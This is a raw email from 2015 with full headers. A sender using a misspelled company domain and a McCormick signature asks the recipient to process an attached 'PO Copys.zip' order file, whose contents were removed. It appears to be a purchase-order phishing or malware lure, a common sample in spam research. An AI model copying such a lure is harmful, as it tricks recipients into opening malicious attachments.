	by pop-siberian.atl.sa.earthlink.net with smtp (Exim 3.36 #1)
	id 1YV8To-0001LI-00; Mon, 09 Mar 2015 20:57:04 -0400
From: "Claudia Hota"<info@caudiahota.com>
Subject: Order
Date: Mon, 9 Mar 2015 17:57:04 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_004D_01C2A9A6.176C099C"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <E1YV8To-0001LI-00@pop-siberian.atl.sa.earthlink.net>
Bcc: 

This is a multi-part message in MIME format.

------=_NextPart_000_004D_01C2A9A6.176C099C
Content-Type: text/plain;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit

Hello
 
Please arrange the attached  new order and inform us the details.
Looking forward to your early reply.
 

 
Purchasing department
Kind regards,

Claudia Hota
Material Coordinator
McCormick Global Ingredients, Limited

Direct Line : 345 814 4110
Office Line: 345-946-5055 (ext 110)

------=_NextPart_000_004D_01C2A9A6.176C099C
Content-Type: message/external-body; access-type=x-deleted; length=72908


Content-Type: application/x-zip-compressed;
	name="PO Copys.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="PO Copys.zip"

